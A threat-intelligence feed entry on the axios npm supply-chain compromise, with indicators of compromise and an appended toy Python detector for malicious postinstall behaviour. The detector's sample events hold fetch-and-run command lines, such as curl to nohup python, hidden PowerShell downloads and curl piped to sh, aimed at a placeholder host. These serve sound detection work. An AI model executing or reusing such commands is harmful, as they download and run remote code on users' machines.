Elastic releases detections for the Axios supply chain compromise
ID: c531668d-7f78-54b7-82ba-fbeb996f5cf5
STIX ID: report--c531668d-7f78-54b7-82ba-fbeb996f5cf5
Feed Name: Elastic Security Labs
Elastic Security Labs describes a supply-chain attack that compromised axios npm releases by adding a postinstall transitive dependency ([email protected]) which spawns native shells to download and detach cross-platform payloads: a Python RAT (Linux), a PowerShell/.NET RAT (Windows), and a Mach-O backdoor (macOS). The report provides behavioral detection rules (process ancestry, detached execution, network retrieval), file/network IOCs (hashes, domain sfrclak.com, IP 142.11.206.73), and persistence indicators to aid rapid detection and response.
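As an added illustration of the behavioural detection the report describes (process ancestry, network retrieval and detached execution), and not Elastic's rules or code, here is a toy Python detector run over constructed process events; the event fields, regexes and every sample command line are assumptions made for the example:

```python
# Toy detector for the pattern described above: a shell spawned under a package-manager
# install that fetches a payload and detaches it. Constructed example; event format and
# sample values are assumptions, not Elastic rule syntax or real telemetry.
import re

PACKAGE_MANAGERS = {"npm", "npm.cmd", "yarn", "pnpm"}
SHELLS = {"sh", "bash", "zsh", "dash", "cmd.exe", "powershell.exe", "pwsh"}
# Command-line fragments that indicate network retrieval of a payload.
FETCH_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|DownloadString|DownloadFile)\b", re.I)
# Fragments that indicate the child is detached from the installing process.
DETACH_RE = re.compile(r"(\bnohup\b|\bsetsid\b|\bdisown\b|&\s*$|start\s+/b|-WindowStyle\s+Hidden)", re.I)


def ancestry(events, pid):
    """Return process names walking from pid up to the root (loop-safe)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["name"])
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Flag shells descended from a package-manager run whose command line fetches and detaches."""
    findings = []
    for e in events:
        if e["name"] not in SHELLS:
            continue
        parents = ancestry(events, e["ppid"])
        if not PACKAGE_MANAGERS & set(parents):
            continue  # shell was not spawned during a package install
        if FETCH_RE.search(e["cmdline"]) and DETACH_RE.search(e["cmdline"]):
            findings.append({"pid": e["pid"], "ancestry": parents, "cmdline": e["cmdline"]})
    return findings


# Constructed sample events (pid, ppid, name, cmdline); hostnames are placeholders.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "name": "npm", "cmdline": "npm install"},
    {"pid": 101, "ppid": 100, "name": "sh", "cmdline": "sh -c node postinstall.js"},
    {"pid": 102, "ppid": 101, "name": "node", "cmdline": "node postinstall.js"},
    {"pid": 103, "ppid": 102, "name": "sh",
     "cmdline": "sh -c 'curl -s http://example.invalid/p.py -o /tmp/p.py && nohup python3 /tmp/p.py &'"},
    {"pid": 104, "ppid": 102, "name": "sh", "cmdline": "sh -c 'node-gyp rebuild'"},  # benign build step
    {"pid": 105, "ppid": 102, "name": "powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -Command Invoke-WebRequest http://example.invalid/a.ps1"},
    {"pid": 200, "ppid": 1, "name": "bash", "cmdline": "bash -c 'curl http://example.invalid/x | nohup sh &'"},
]
```

The benign build step (pid 104) and the shell with no package-manager ancestry (pid 200) are not flagged, which is the point of combining ancestry with the command-line indicators rather than alerting on either alone.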
